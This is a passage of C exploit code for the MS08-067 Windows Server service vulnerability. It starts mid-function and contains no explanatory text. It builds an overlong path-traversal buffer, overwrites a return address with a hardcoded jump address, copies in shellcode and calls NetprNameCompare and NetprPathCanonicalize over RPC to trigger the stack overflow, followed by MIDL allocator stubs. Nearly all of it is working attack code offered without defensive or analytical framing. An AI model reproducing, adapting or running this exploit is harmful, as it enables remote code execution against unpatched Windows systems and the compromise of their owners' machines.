WCHAR szBuffer[] = L".\\\\x\\..\\..\\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx00xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"; // EIP Address
int * callback_address = (int *)(szBuffer + 90);
*callback_address = (int)0x5FE1BF83;
strcpy((char *)callback_address + 4, (char *)ShellCode); long type = 1;
_NetprNameCompare(mIDA_interface_v3_0_c_ifspec, L"MS08067", (wchar_t *)"\x53\x00\x56\x89\x56\x89\x56\x89\x56\x89", (wchar_t *)"\x4D\x00\x56\x89\x56\x89", 4, 0);
_NetprPathCanonicalize(mIDA_interface_v3_0_c_ifspec, L"MS08067", szBuffer, buff, sizeof(buff), L"", &type, 0);
} RpcExcept(EXCEPTION_EXECUTE_HANDLER) {
unsigned long ulCode = RpcExceptionCode();
printf_s("Runtime reported exception 0x%lx = %ld\n", ulCode, ulCode);
} RpcEndExcept
} /*********************************************************************/
/* MIDL allocate and free */
/*********************************************************************/ void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len)
{
return(malloc(len));
} void __RPC_USER midl_user_free(void __RPC_FAR * ptr)
{
free(ptr);
}
|
Tools 
